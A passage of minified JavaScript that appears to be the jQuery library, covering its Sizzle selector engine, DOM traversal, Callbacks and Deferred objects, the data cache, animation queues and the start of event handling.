c},d=ga.selectors={cacheLength:50,createPseudo:ia,match:X,attrHandle:{},find:{},relative:{">":{dir:"parentNode",first:!0}," ":{dir:"parentNode"},"+":{dir:"previousSibling",first:!0},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(a){return a[1]=a[1].replace(ca,da),a[3]=(a[3]||a[4]||a[5]||"").replace(ca,da),"~="===a[2]&&(a[3]=" "+a[3]+" "),a.slice(0,4)},CHILD:function(a){return a[1]=a[1].toLowerCase(),"nth"===a[1].slice(0,3)?(a[3]||ga.error(a[0]),a[4]=+(a[4]?a[5]+(a[6]||1):2*("even"===a[3]||"odd"===a[3])),a[5]=+(a[7]+a[8]||"odd"===a[3])):a[3]&&ga.error(a[0]),a},PSEUDO:function(a){var b,c=!a[6]&&a[2];return X.CHILD.test(a[0])?null:(a[3]?a[2]=a[4]||a[5]||"":c&&V.test(c)&&(b=g(c,!0))&&(b=c.indexOf(")",c.length-b)-c.length)&&(a[0]=a[0].slice(0,b),a[2]=c.slice(0,b)),a.slice(0,3))}},filter:{TAG:function(a){var b=a.replace(ca,da).toLowerCase();return"*"===a?function(){return!0}:function(a){return a.nodeName&&a.nodeName.toLowerCase()===b}},CLASS:function(a){var b=y[a+" "];return b||(b=new RegExp("(^|"+L+")"+a+"("+L+"|$)"))&&y(a,function(a){return b.test("string"==typeof a.className&&a.className||"undefined"!=typeof a.getAttribute&&a.getAttribute("class")||"")})},ATTR:function(a,b,c){return function(d){var e=ga.attr(d,a);return null==e?"!="===b:b?(e+="","="===b?e===c:"!="===b?e!==c:"^="===b?c&&0===e.indexOf(c):"*="===b?c&&e.indexOf(c)>-1:"$="===b?c&&e.slice(-c.length)===c:"~="===b?(" "+e.replace(Q," ")+" ").indexOf(c)>-1:"|="===b?e===c||e.slice(0,c.length+1)===c+"-":!1):!0}},CHILD:function(a,b,c,d,e){var f="nth"!==a.slice(0,3),g="last"!==a.slice(-4),h="of-type"===b;return 1===d&&0===e?function(a){return!!a.parentNode}:function(b,c,i){var j,k,l,m,n,o,p=f!==g?"nextSibling":"previousSibling",q=b.parentNode,r=h&&b.nodeName.toLowerCase(),s=!i&&!h;if(q){if(f){while(p){l=b;while(l=l[p])if(h?l.nodeName.toLowerCase()===r:1===l.nodeType)return!1;o=p="only"===a&&!o&&"nextSibling"}return!0}if(o=[g?q.firstChild:q.lastChild],g&&s){k=q[u]||(q[u]={}),j=k[a]||[],n=j[0]===w&&j[1],m=j[0]===w&&j[2],l=n&&q.childNodes[n];while(l=++n&&l&&l[p]||(m=n=0)||o.pop())if(1===l.nodeType&&++m&&l===b){k[a]=[w,n,m];break}}else if(s&&(j=(b[u]||(b[u]={}))[a])&&j[0]===w)m=j[1];else while(l=++n&&l&&l[p]||(m=n=0)||o.pop())if((h?l.nodeName.toLowerCase()===r:1===l.nodeType)&&++m&&(s&&((l[u]||(l[u]={}))[a]=[w,m]),l===b))break;return m-=e,m===d||m%d===0&&m/d>=0}}},PSEUDO:function(a,b){var c,e=d.pseudos[a]||d.setFilters[a.toLowerCase()]||ga.error("unsupported pseudo: "+a);return e[u]?e(b):e.length>1?(c=[a,a,"",b],d.setFilters.hasOwnProperty(a.toLowerCase())?ia(function(a,c){var d,f=e(a,b),g=f.length;while(g--)d=J(a,f[g]),a[d]=!(c[d]=f[g])}):function(a){return e(a,0,c)}):e}},pseudos:{not:ia(function(a){var b=[],c=[],d=h(a.replace(R,"$1"));return d[u]?ia(function(a,b,c,e){var f,g=d(a,null,e,[]),h=a.length;while(h--)(f=g[h])&&(a[h]=!(b[h]=f))}):function(a,e,f){return b[0]=a,d(b,null,f,c),b[0]=null,!c.pop()}}),has:ia(function(a){return function(b){return ga(a,b).length>0}}),contains:ia(function(a){return a=a.replace(ca,da),function(b){return(b.textContent||b.innerText||e(b)).indexOf(a)>-1}}),lang:ia(function(a){return W.test(a||"")||ga.error("unsupported lang: "+a),a=a.replace(ca,da).toLowerCase(),function(b){var c;do if(c=p?b.lang:b.getAttribute("xml:lang")||b.getAttribute("lang"))return c=c.toLowerCase(),c===a||0===c.indexOf(a+"-");while((b=b.parentNode)&&1===b.nodeType);return!1}}),target:function(b){var c=a.location&&a.location.hash;return c&&c.slice(1)===b.id},root:function(a){return a===o},focus:function(a){return a===n.activeElement&&(!n.hasFocus||n.hasFocus())&&!!(a.type||a.href||~a.tabIndex)},enabled:function(a){return a.disabled===!1},disabled:function(a){return a.disabled===!0},checked:function(a){var b=a.nodeName.toLowerCase();return"input"===b&&!!a.checked||"option"===b&&!!a.selected},selected:function(a){return a.parentNode&&a.parentNode.selectedIndex,a.selected===!0},empty:function(a){for(a=a.firstChild;a;a=a.nextSibling)if(a.nodeType<6)return!1;return!0},parent:function(a){return!d.pseudos.empty(a)},header:function(a){return Z.test(a.nodeName)},input:function(a){return Y.test(a.nodeName)},button:function(a){var b=a.nodeName.toLowerCase();return"input"===b&&"button"===a.type||"button"===b},text:function(a){var b;return"input"===a.nodeName.toLowerCase()&&"text"===a.type&&(null==(b=a.getAttribute("type"))||"text"===b.toLowerCase())},first:oa(function(){return[0]}),last:oa(function(a,b){return[b-1]}),eq:oa(function(a,b,c){return[0>c?c+b:c]}),even:oa(function(a,b){for(var c=0;b>c;c+=2)a.push(c);return a}),odd:oa(function(a,b){for(var c=1;b>c;c+=2)a.push(c);return a}),lt:oa(function(a,b,c){for(var d=0>c?c+b:c;--d>=0;)a.push(d);return a}),gt:oa(function(a,b,c){for(var d=0>c?c+b:c;++d<b;)a.push(d);return a})}},d.pseudos.nth=d.pseudos.eq;for(b in{radio:!0,checkbox:!0,file:!0,password:!0,image:!0})d.pseudos[b]=ma(b);for(b in{submit:!0,reset:!0})d.pseudos[b]=na(b);function qa(){}qa.prototype=d.filters=d.pseudos,d.setFilters=new qa,g=ga.tokenize=function(a,b){var c,e,f,g,h,i,j,k=z[a+" "];if(k)return b?0:k.slice(0);h=a,i=[],j=d.preFilter;while(h){(!c||(e=S.exec(h)))&&(e&&(h=h.slice(e[0].length)||h),i.push(f=[])),c=!1,(e=T.exec(h))&&(c=e.shift(),f.push({value:c,type:e[0].replace(R," ")}),h=h.slice(c.length));for(g in d.filter)!(e=X[g].exec(h))||j[g]&&!(e=j[g](e))||(c=e.shift(),f.push({value:c,type:g,matches:e}),h=h.slice(c.length));if(!c)break}return b?h.length:h?ga.error(a):z(a,i).slice(0)};function ra(a){for(var b=0,c=a.length,d="";c>b;b++)d+=a[b].value;return d}function sa(a,b,c){var d=b.dir,e=c&&"parentNode"===d,f=x++;return b.first?function(b,c,f){while(b=b[d])if(1===b.nodeType||e)return a(b,c,f)}:function(b,c,g){var h,i,j=[w,f];if(g){while(b=b[d])if((1===b.nodeType||e)&&a(b,c,g))return!0}else while(b=b[d])if(1===b.nodeType||e){if(i=b[u]||(b[u]={}),(h=i[d])&&h[0]===w&&h[1]===f)return j[2]=h[2];if(i[d]=j,j[2]=a(b,c,g))return!0}}}function ta(a){return a.length>1?function(b,c,d){var e=a.length;while(e--)if(!a[e](b,c,d))return!1;return!0}:a[0]}function ua(a,b,c){for(var d=0,e=b.length;e>d;d++)ga(a,b[d],c);return c}function va(a,b,c,d,e){for(var f,g=[],h=0,i=a.length,j=null!=b;i>h;h++)(f=a[h])&&(!c||c(f,d,e))&&(g.push(f),j&&b.push(h));return g}function wa(a,b,c,d,e,f){return d&&!d[u]&&(d=wa(d)),e&&!e[u]&&(e=wa(e,f)),ia(function(f,g,h,i){var j,k,l,m=[],n=[],o=g.length,p=f||ua(b||"*",h.nodeType?[h]:h,[]),q=!a||!f&&b?p:va(p,m,a,h,i),r=c?e||(f?a:o||d)?[]:g:q;if(c&&c(q,r,h,i),d){j=va(r,n),d(j,[],h,i),k=j.length;while(k--)(l=j[k])&&(r[n[k]]=!(q[n[k]]=l))}if(f){if(e||a){if(e){j=[],k=r.length;while(k--)(l=r[k])&&j.push(q[k]=l);e(null,r=[],j,i)}k=r.length;while(k--)(l=r[k])&&(j=e?J(f,l):m[k])>-1&&(f[j]=!(g[j]=l))}}else r=va(r===g?r.splice(o,r.length):r),e?e(null,g,r,i):H.apply(g,r)})}function xa(a){for(var b,c,e,f=a.length,g=d.relative[a[0].type],h=g||d.relative[" "],i=g?1:0,k=sa(function(a){return a===b},h,!0),l=sa(function(a){return J(b,a)>-1},h,!0),m=[function(a,c,d){var e=!g&&(d||c!==j)||((b=c).nodeType?k(a,c,d):l(a,c,d));return b=null,e}];f>i;i++)if(c=d.relative[a[i].type])m=[sa(ta(m),c)];else{if(c=d.filter[a[i].type].apply(null,a[i].matches),c[u]){for(e=++i;f>e;e++)if(d.relative[a[e].type])break;return wa(i>1&&ta(m),i>1&&ra(a.slice(0,i-1).concat({value:" "===a[i-2].type?"*":""})).replace(R,"$1"),c,e>i&&xa(a.slice(i,e)),f>e&&xa(a=a.slice(e)),f>e&&ra(a))}m.push(c)}return ta(m)}function ya(a,b){var c=b.length>0,e=a.length>0,f=function(f,g,h,i,k){var l,m,o,p=0,q="0",r=f&&[],s=[],t=j,u=f||e&&d.find.TAG("*",k),v=w+=null==t?1:Math.random()||.1,x=u.length;for(k&&(j=g!==n&&g);q!==x&&null!=(l=u[q]);q++){if(e&&l){m=0;while(o=a[m++])if(o(l,g,h)){i.push(l);break}k&&(w=v)}c&&((l=!o&&l)&&p--,f&&r.push(l))}if(p+=q,c&&q!==p){m=0;while(o=b[m++])o(r,s,g,h);if(f){if(p>0)while(q--)r[q]||s[q]||(s[q]=F.call(i));s=va(s)}H.apply(i,s),k&&!f&&s.length>0&&p+b.length>1&&ga.uniqueSort(i)}return k&&(w=v,j=t),r};return c?ia(f):f}return h=ga.compile=function(a,b){var c,d=[],e=[],f=A[a+" "];if(!f){b||(b=g(a)),c=b.length;while(c--)f=xa(b[c]),f[u]?d.push(f):e.push(f);f=A(a,ya(e,d)),f.selector=a}return f},i=ga.select=function(a,b,e,f){var i,j,k,l,m,n="function"==typeof a&&a,o=!f&&g(a=n.selector||a);if(e=e||[],1===o.length){if(j=o[0]=o[0].slice(0),j.length>2&&"ID"===(k=j[0]).type&&c.getById&&9===b.nodeType&&p&&d.relative[j[1].type]){if(b=(d.find.ID(k.matches[0].replace(ca,da),b)||[])[0],!b)return e;n&&(b=b.parentNode),a=a.slice(j.shift().value.length)}i=X.needsContext.test(a)?0:j.length;while(i--){if(k=j[i],d.relative[l=k.type])break;if((m=d.find[l])&&(f=m(k.matches[0].replace(ca,da),aa.test(j[0].type)&&pa(b.parentNode)||b))){if(j.splice(i,1),a=f.length&&ra(j),!a)return H.apply(e,f),e;break}}}return(n||h(a,o))(f,b,!p,e,aa.test(a)&&pa(b.parentNode)||b),e},c.sortStable=u.split("").sort(B).join("")===u,c.detectDuplicates=!!l,m(),c.sortDetached=ja(function(a){return 1&a.compareDocumentPosition(n.createElement("div"))}),ja(function(a){return a.innerHTML="<a href='#'></a>","#"===a.firstChild.getAttribute("href")})||ka("type|href|height|width",function(a,b,c){return c?void 0:a.getAttribute(b,"type"===b.toLowerCase()?1:2)}),c.attributes&&ja(function(a){return a.innerHTML="<input/>",a.firstChild.setAttribute("value",""),""===a.firstChild.getAttribute("value")})||ka("value",function(a,b,c){return c||"input"!==a.nodeName.toLowerCase()?void 0:a.defaultValue}),ja(function(a){return null==a.getAttribute("disabled")})||ka(K,function(a,b,c){var d;return c?void 0:a[b]===!0?b.toLowerCase():(d=a.getAttributeNode(b))&&d.specified?d.value:null}),ga}(a);n.find=t,n.expr=t.selectors,n.expr[":"]=n.expr.pseudos,n.unique=t.uniqueSort,n.text=t.getText,n.isXMLDoc=t.isXML,n.contains=t.contains;var u=n.expr.match.needsContext,v=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,w=/^.[^:#\[\.,]*$/;function x(a,b,c){if(n.isFunction(b))return n.grep(a,function(a,d){return!!b.call(a,d,a)!==c});if(b.nodeType)return n.grep(a,function(a){return a===b!==c});if("string"==typeof b){if(w.test(b))return n.filter(b,a,c);b=n.filter(b,a)}return n.grep(a,function(a){return g.call(b,a)>=0!==c})}n.filter=function(a,b,c){var d=b[0];return c&&(a=":not("+a+")"),1===b.length&&1===d.nodeType?n.find.matchesSelector(d,a)?[d]:[]:n.find.matches(a,n.grep(b,function(a){return 1===a.nodeType}))},n.fn.extend({find:function(a){var b,c=this.length,d=[],e=this;if("string"!=typeof a)return this.pushStack(n(a).filter(function(){for(b=0;c>b;b++)if(n.contains(e[b],this))return!0}));for(b=0;c>b;b++)n.find(a,e[b],d);return d=this.pushStack(c>1?n.unique(d):d),d.selector=this.selector?this.selector+" "+a:a,d},filter:function(a){return this.pushStack(x(this,a||[],!1))},not:function(a){return this.pushStack(x(this,a||[],!0))},is:function(a){return!!x(this,"string"==typeof a&&u.test(a)?n(a):a||[],!1).length}});var y,z=/^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]*))$/,A=n.fn.init=function(a,b){var c,d;if(!a)return this;if("string"==typeof a){if(c="<"===a[0]&&">"===a[a.length-1]&&a.length>=3?[null,a,null]:z.exec(a),!c||!c[1]&&b)return!b||b.jquery?(b||y).find(a):this.constructor(b).find(a);if(c[1]){if(b=b instanceof n?b[0]:b,n.merge(this,n.parseHTML(c[1],b&&b.nodeType?b.ownerDocument||b:l,!0)),v.test(c[1])&&n.isPlainObject(b))for(c in b)n.isFunction(this[c])?this[c](b[c]):this.attr(c,b[c]);return this}return d=l.getElementById(c[2]),d&&d.parentNode&&(this.length=1,this[0]=d),this.context=l,this.selector=a,this}return a.nodeType?(this.context=this[0]=a,this.length=1,this):n.isFunction(a)?"undefined"!=typeof y.ready?y.ready(a):a(n):(void 0!==a.selector&&(this.selector=a.selector,this.context=a.context),n.makeArray(a,this))};A.prototype=n.fn,y=n(l);var B=/^(?:parents|prev(?:Until|All))/,C={children:!0,contents:!0,next:!0,prev:!0};n.extend({dir:function(a,b,c){var d=[],e=void 0!==c;while((a=a[b])&&9!==a.nodeType)if(1===a.nodeType){if(e&&n(a).is(c))break;d.push(a)}return d},sibling:function(a,b){for(var c=[];a;a=a.nextSibling)1===a.nodeType&&a!==b&&c.push(a);return c}}),n.fn.extend({has:function(a){var b=n(a,this),c=b.length;return this.filter(function(){for(var a=0;c>a;a++)if(n.contains(this,b[a]))return!0})},closest:function(a,b){for(var c,d=0,e=this.length,f=[],g=u.test(a)||"string"!=typeof a?n(a,b||this.context):0;e>d;d++)for(c=this[d];c&&c!==b;c=c.parentNode)if(c.nodeType<11&&(g?g.index(c)>-1:1===c.nodeType&&n.find.matchesSelector(c,a))){f.push(c);break}return this.pushStack(f.length>1?n.unique(f):f)},index:function(a){return a?"string"==typeof a?g.call(n(a),this[0]):g.call(this,a.jquery?a[0]:a):this[0]&&this[0].parentNode?this.first().prevAll().length:-1},add:function(a,b){return this.pushStack(n.unique(n.merge(this.get(),n(a,b))))},addBack:function(a){return this.add(null==a?this.prevObject:this.prevObject.filter(a))}});function D(a,b){while((a=a[b])&&1!==a.nodeType);return a}n.each({parent:function(a){var b=a.parentNode;return b&&11!==b.nodeType?b:null},parents:function(a){return n.dir(a,"parentNode")},parentsUntil:function(a,b,c){return n.dir(a,"parentNode",c)},next:function(a){return D(a,"nextSibling")},prev:function(a){return D(a,"previousSibling")},nextAll:function(a){return n.dir(a,"nextSibling")},prevAll:function(a){return n.dir(a,"previousSibling")},nextUntil:function(a,b,c){return n.dir(a,"nextSibling",c)},prevUntil:function(a,b,c){return n.dir(a,"previousSibling",c)},siblings:function(a){return n.sibling((a.parentNode||{}).firstChild,a)},children:function(a){return n.sibling(a.firstChild)},contents:function(a){return a.contentDocument||n.merge([],a.childNodes)}},function(a,b){n.fn[a]=function(c,d){var e=n.map(this,b,c);return"Until"!==a.slice(-5)&&(d=c),d&&"string"==typeof d&&(e=n.filter(d,e)),this.length>1&&(C[a]||n.unique(e),B.test(a)&&e.reverse()),this.pushStack(e)}});var E=/\S+/g,F={};function G(a){var b=F[a]={};return n.each(a.match(E)||[],function(a,c){b[c]=!0}),b}n.Callbacks=function(a){a="string"==typeof a?F[a]||G(a):n.extend({},a);var b,c,d,e,f,g,h=[],i=!a.once&&[],j=function(l){for(b=a.memory&&l,c=!0,g=e||0,e=0,f=h.length,d=!0;h&&f>g;g++)if(h[g].apply(l[0],l[1])===!1&&a.stopOnFalse){b=!1;break}d=!1,h&&(i?i.length&&j(i.shift()):b?h=[]:k.disable())},k={add:function(){if(h){var c=h.length;!function g(b){n.each(b,function(b,c){var d=n.type(c);"function"===d?a.unique&&k.has(c)||h.push(c):c&&c.length&&"string"!==d&&g(c)})}(arguments),d?f=h.length:b&&(e=c,j(b))}return this},remove:function(){return h&&n.each(arguments,function(a,b){var c;while((c=n.inArray(b,h,c))>-1)h.splice(c,1),d&&(f>=c&&f--,g>=c&&g--)}),this},has:function(a){return a?n.inArray(a,h)>-1:!(!h||!h.length)},empty:function(){return h=[],f=0,this},disable:function(){return h=i=b=void 0,this},disabled:function(){return!h},lock:function(){return i=void 0,b||k.disable(),this},locked:function(){return!i},fireWith:function(a,b){return!h||c&&!i||(b=b||[],b=[a,b.slice?b.slice():b],d?i.push(b):j(b)),this},fire:function(){return k.fireWith(this,arguments),this},fired:function(){return!!c}};return k},n.extend({Deferred:function(a){var b=[["resolve","done",n.Callbacks("once memory"),"resolved"],["reject","fail",n.Callbacks("once memory"),"rejected"],["notify","progress",n.Callbacks("memory")]],c="pending",d={state:function(){return c},always:function(){return e.done(arguments).fail(arguments),this},then:function(){var a=arguments;return n.Deferred(function(c){n.each(b,function(b,f){var g=n.isFunction(a[b])&&a[b];e[f[1]](function(){var a=g&&g.apply(this,arguments);a&&n.isFunction(a.promise)?a.promise().done(c.resolve).fail(c.reject).progress(c.notify):c[f[0]+"With"](this===d?c.promise():this,g?[a]:arguments)})}),a=null}).promise()},promise:function(a){return null!=a?n.extend(a,d):d}},e={};return d.pipe=d.then,n.each(b,function(a,f){var g=f[2],h=f[3];d[f[1]]=g.add,h&&g.add(function(){c=h},b[1^a][2].disable,b[2][2].lock),e[f[0]]=function(){return e[f[0]+"With"](this===e?d:this,arguments),this},e[f[0]+"With"]=g.fireWith}),d.promise(e),a&&a.call(e,e),e},when:function(a){var b=0,c=d.call(arguments),e=c.length,f=1!==e||a&&n.isFunction(a.promise)?e:0,g=1===f?a:n.Deferred(),h=function(a,b,c){return function(e){b[a]=this,c[a]=arguments.length>1?d.call(arguments):e,c===i?g.notifyWith(b,c):--f||g.resolveWith(b,c)}},i,j,k;if(e>1)for(i=new Array(e),j=new Array(e),k=new Array(e);e>b;b++)c[b]&&n.isFunction(c[b].promise)?c[b].promise().done(h(b,k,c)).fail(g.reject).progress(h(b,j,i)):--f;return f||g.resolveWith(k,c),g.promise()}});var H;n.fn.ready=function(a){return n.ready.promise().done(a),this},n.extend({isReady:!1,readyWait:1,holdReady:function(a){a?n.readyWait++:n.ready(!0)},ready:function(a){(a===!0?--n.readyWait:n.isReady)||(n.isReady=!0,a!==!0&&--n.readyWait>0||(H.resolveWith(l,[n]),n.fn.triggerHandler&&(n(l).triggerHandler("ready"),n(l).off("ready"))))}});function I(){l.removeEventListener("DOMContentLoaded",I,!1),a.removeEventListener("load",I,!1),n.ready()}n.ready.promise=function(b){return H||(H=n.Deferred(),"complete"===l.readyState?setTimeout(n.ready):(l.addEventListener("DOMContentLoaded",I,!1),a.addEventListener("load",I,!1))),H.promise(b)},n.ready.promise();var J=n.access=function(a,b,c,d,e,f,g){var h=0,i=a.length,j=null==c;if("object"===n.type(c)){e=!0;for(h in c)n.access(a,b,h,c[h],!0,f,g)}else if(void 0!==d&&(e=!0,n.isFunction(d)||(g=!0),j&&(g?(b.call(a,d),b=null):(j=b,b=function(a,b,c){return j.call(n(a),c)})),b))for(;i>h;h++)b(a[h],c,g?d:d.call(a[h],h,b(a[h],c)));return e?a:j?b.call(a):i?b(a[0],c):f};n.acceptData=function(a){return 1===a.nodeType||9===a.nodeType||!+a.nodeType};function K(){Object.defineProperty(this.cache={},0,{get:function(){return{}}}),this.expando=n.expando+K.uid++}K.uid=1,K.accepts=n.acceptData,K.prototype={key:function(a){if(!K.accepts(a))return 0;var b={},c=a[this.expando];if(!c){c=K.uid++;try{b[this.expando]={value:c},Object.defineProperties(a,b)}catch(d){b[this.expando]=c,n.extend(a,b)}}return this.cache[c]||(this.cache[c]={}),c},set:function(a,b,c){var d,e=this.key(a),f=this.cache[e];if("string"==typeof b)f[b]=c;else if(n.isEmptyObject(f))n.extend(this.cache[e],b);else for(d in b)f[d]=b[d];return f},get:function(a,b){var c=this.cache[this.key(a)];return void 0===b?c:c[b]},access:function(a,b,c){var d;return void 0===b||b&&"string"==typeof b&&void 0===c?(d=this.get(a,b),void 0!==d?d:this.get(a,n.camelCase(b))):(this.set(a,b,c),void 0!==c?c:b)},remove:function(a,b){var c,d,e,f=this.key(a),g=this.cache[f];if(void 0===b)this.cache[f]={};else{n.isArray(b)?d=b.concat(b.map(n.camelCase)):(e=n.camelCase(b),b in g?d=[b,e]:(d=e,d=d in g?[d]:d.match(E)||[])),c=d.length;while(c--)delete g[d[c]]}},hasData:function(a){return!n.isEmptyObject(this.cache[a[this.expando]]||{})},discard:function(a){a[this.expando]&&delete this.cache[a[this.expando]]}};var L=new K,M=new K,N=/^(?:\{[\w\W]*\}|\[[\w\W]*\])$/,O=/([A-Z])/g;function P(a,b,c){var d;if(void 0===c&&1===a.nodeType)if(d="data-"+b.replace(O,"-$1").toLowerCase(),c=a.getAttribute(d),"string"==typeof c){try{c="true"===c?!0:"false"===c?!1:"null"===c?null:+c+""===c?+c:N.test(c)?n.parseJSON(c):c}catch(e){}M.set(a,b,c)}else c=void 0;return c}n.extend({hasData:function(a){return M.hasData(a)||L.hasData(a)},data:function(a,b,c){
-return M.access(a,b,c)},removeData:function(a,b){M.remove(a,b)},_data:function(a,b,c){return L.access(a,b,c)},_removeData:function(a,b){L.remove(a,b)}}),n.fn.extend({data:function(a,b){var c,d,e,f=this[0],g=f&&f.attributes;if(void 0===a){if(this.length&&(e=M.get(f),1===f.nodeType&&!L.get(f,"hasDataAttrs"))){c=g.length;while(c--)g[c]&&(d=g[c].name,0===d.indexOf("data-")&&(d=n.camelCase(d.slice(5)),P(f,d,e[d])));L.set(f,"hasDataAttrs",!0)}return e}return"object"==typeof a?this.each(function(){M.set(this,a)}):J(this,function(b){var c,d=n.camelCase(a);if(f&&void 0===b){if(c=M.get(f,a),void 0!==c)return c;if(c=M.get(f,d),void 0!==c)return c;if(c=P(f,d,void 0),void 0!==c)return c}else this.each(function(){var c=M.get(this,d);M.set(this,d,b),-1!==a.indexOf("-")&&void 0!==c&&M.set(this,a,b)})},null,b,arguments.length>1,null,!0)},removeData:function(a){return this.each(function(){M.remove(this,a)})}}),n.extend({queue:function(a,b,c){var d;return a?(b=(b||"fx")+"queue",d=L.get(a,b),c&&(!d||n.isArray(c)?d=L.access(a,b,n.makeArray(c)):d.push(c)),d||[]):void 0},dequeue:function(a,b){b=b||"fx";var c=n.queue(a,b),d=c.length,e=c.shift(),f=n._queueHooks(a,b),g=function(){n.dequeue(a,b)};"inprogress"===e&&(e=c.shift(),d--),e&&("fx"===b&&c.unshift("inprogress"),delete f.stop,e.call(a,g,f)),!d&&f&&f.empty.fire()},_queueHooks:function(a,b){var c=b+"queueHooks";return L.get(a,c)||L.access(a,c,{empty:n.Callbacks("once memory").add(function(){L.remove(a,[b+"queue",c])})})}}),n.fn.extend({queue:function(a,b){var c=2;return"string"!=typeof a&&(b=a,a="fx",c--),arguments.length<c?n.queue(this[0],a):void 0===b?this:this.each(function(){var c=n.queue(this,a,b);n._queueHooks(this,a),"fx"===a&&"inprogress"!==c[0]&&n.dequeue(this,a)})},dequeue:function(a){return this.each(function(){n.dequeue(this,a)})},clearQueue:function(a){return this.queue(a||"fx",[])},promise:function(a,b){var c,d=1,e=n.Deferred(),f=this,g=this.length,h=function(){--d||e.resolveWith(f,[f])};"string"!=typeof a&&(b=a,a=void 0),a=a||"fx";while(g--)c=L.get(f[g],a+"queueHooks"),c&&c.empty&&(d++,c.empty.add(h));return h(),e.promise(b)}});var Q=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,R=["Top","Right","Bottom","Left"],S=function(a,b){return a=b||a,"none"===n.css(a,"display")||!n.contains(a.ownerDocument,a)},T=/^(?:checkbox|radio)$/i;!function(){var a=l.createDocumentFragment(),b=a.appendChild(l.createElement("div")),c=l.createElement("input");c.setAttribute("type","radio"),c.setAttribute("checked","checked"),c.setAttribute("name","t"),b.appendChild(c),k.checkClone=b.cloneNode(!0).cloneNode(!0).lastChild.checked,b.innerHTML="<textarea>x</textarea>",k.noCloneChecked=!!b.cloneNode(!0).lastChild.defaultValue}();var U="undefined";k.focusinBubbles="onfocusin"in a;var V=/^key/,W=/^(?:mouse|pointer|contextmenu)|click/,X=/^(?:focusinfocus|focusoutblur)$/,Y=/^([^.]*)(?:\.(.+)|)$/;function Z(){return!0}function $(){return!1}function _(){try{return l.activeElement}catch(a){}}n.event={global:{},add:function(a,b,c,d,e){var f,g,h,i,j,k,l,m,o,p,q,r=L.get(a);if(r){c.handler&&(f=c,c=f.handler,e=f.selector),c.guid||(c.guid=n.guid++),(i=r.events)||(i=r.events={}),(g=r.handle)||(g=r.handle=function(b){return typeof n!==U&&n.event.triggered!==b.type?n.event.dispatch.apply(a,arguments):void 0}),b=(b||"").match(E)||[""],j=b.length;while(j--)h=Y.exec(b[j])||[],o=q=h[1],p=(h[2]||"").split(".").sort(),o&&(l=n.event.special[o]||{},o=(e?l.delegateType:l.bindType)||o,l=n.event.special[o]||{},k=n.extend({type:o,origType:q,data:d,handler:c,guid:c.guid,selector:e,needsContext:e&&n.expr.match.needsContext.test(e),namespace:p.join(".")},f),(m=i[o])||(m=i[o]=[],m.delegateCount=0,l.setup&&l.setup.call(a,d,p,g)!==!1||a.addEventListener&&a.addEventListener(o,g,!1)),l.add&&(l.add.call(a,k),k.handler.guid||(k.handler.guid=c.guid)),e?m.splice(m.delegateCount++,0,k):m.push(k),n.event.global[o]=!0)}},remove:function(a,b,c,d,e){var f,g,h,i,j,k,l,m,o,p,q,r=L.hasData(a)&&L.get(a);if(r&&(i=r.events)){b=(b||"").match(E)||[""],j=b.length;while(j--)if(h=Y.exec(b[j])||[],o=q=h[1],p=(h[2]||"").split(".").sort(),o){l=n.event.special[o]||{},o=(d?l.delegateType:l.bindType)||o,m=i[o]||[],h=h[2]&&new RegExp("(^|\\.)"+p.join("\\.(?:.*\\.|)")+"(\\.|$)"),g=f=m.length;while(f--)k=m[f],!e&&q!==k.origType||c&&c.guid!==k.guid||h&&!h.test(k.namespace)||d&&d!==k.selector&&("**"!==d||!k.selector)||(m.splice(f,1),k.selector&&m.delegateCount--,l.remove&&l.remove.call(a,k));g&&!m.length&&(l.teardown&&l.teardown.call(a,p,r.handle)!==!1||n.removeEvent(a,o,r.handle),delete i[o])}else for(o in i)n.event.remove(a,o+b[j],c,d,!0);n.isEmptyObject(i)&&(delete r.handle,L.remove(a,"events"))}},trigger:function(b,c,d,e){var f,g,h,i,k,m,o,p=[d||l],q=j.call(b,"type")?b.type:b,r=j.call(b,"namespace")?b.namespace.split("."):[];if(g=h=d=d||l,3!==d.nodeType&&8!==d.nodeType&&!X.test(q+n.event.triggered)&&(q.indexOf(".")>=0&&(r=q.split("."),q=r.shift(),r.sort()),k=q.indexOf(":")<0&&"on"+q,b=b[n.expando]?b:new n.Event(q,"object"==typeof b&&b),b.isTrigger=e?2:3,b.namespace=r.join("."),b.namespace_re=b.namespace?new RegExp("(^|\\.)"+r.join("\\.(?:.*\\.|)")+"(\\.|$)"):null,b.result=void 0,b.target||(b.target=d),c=null==c?[b]:n.makeArray(c,[b]),o=n.event.special[q]||{},e||!o.trigger||o.trigger.apply(d,c)!==!1)){if(!e&&!o.noBubble&&!n.isWindow(d)){for(i=o.delegateType||q,X.test(i+q)||(g=g.parentNode);g;g=g.parentNode)p.push(g),h=g;h===(d.ownerDocument||l)&&p.push(h.defaultView||h.parentWindow||a)}f=0;while((g=p[f++])&&!b.isPropagationStopped())b.type=f>1?i:o.bindType||q,m=(L.get(g,"events")||{})[b.type]&&L.get(g,"handle"),m&&m.apply(g,c),m=k&&g[k],m&&m.apply&&n.acceptData(g)&&(b.result=m.apply(g,c),b.result===!1&&b.preventDefault());return b.type=q,e||b.isDefaultPrevented()||o._default&&o._default.apply(p.pop(),c)!==!1||!n.acceptData(d)||k&&n.isFunction(d[q])&&!n.isWindow(d)&&(h=d[k],h&&(d[k]=null),n.event.triggered=q,d[q](),n.event.triggered=void 0,h&&(d[k]=h)),b.result}},dispatch:function(a){a=n.event.fix(a);var b,c,e,f,g,h=[],i=d.call(arguments),j=(L.get(this,"events")||{})[a.type]||[],k=n.event.special[a.type]||{};if(i[0]=a,a.delegateTarget=this,!k.preDispatch||k.preDispatch.call(this,a)!==!1){h=n.event.handlers.call(this,a,j),b=0;while((f=h[b++])&&!a.isPropagationStopped()){a.currentTarget=f.elem,c=0;while((g=f.handlers[c++])&&!a.isImmediatePropagationStopped())(!a.namespace_re||a.namespace_re.test(g.namespace))&&(a.handleObj=g,a.data=g.data,e=((n.event.special[g.origType]||{}).handle||g.handler).apply(f.elem,i),void 0!==e&&(a.result=e)===!1&&(a.preventDefault(),a.stopPropagation()))}return k.postDispatch&&k.postDispatch.call(this,a),a.result}},handlers:function(a,b){var c,d,e,f,g=[],h=b.delegateCount,i=a.target;if(h&&i.nodeType&&(!a.button||"click"!==a.type))for(;i!==this;i=i.parentNode||this)if(i.disabled!==!0||"click"!==a.type){for(d=[],c=0;h>c;c++)f=b[c],e=f.selector+" ",void 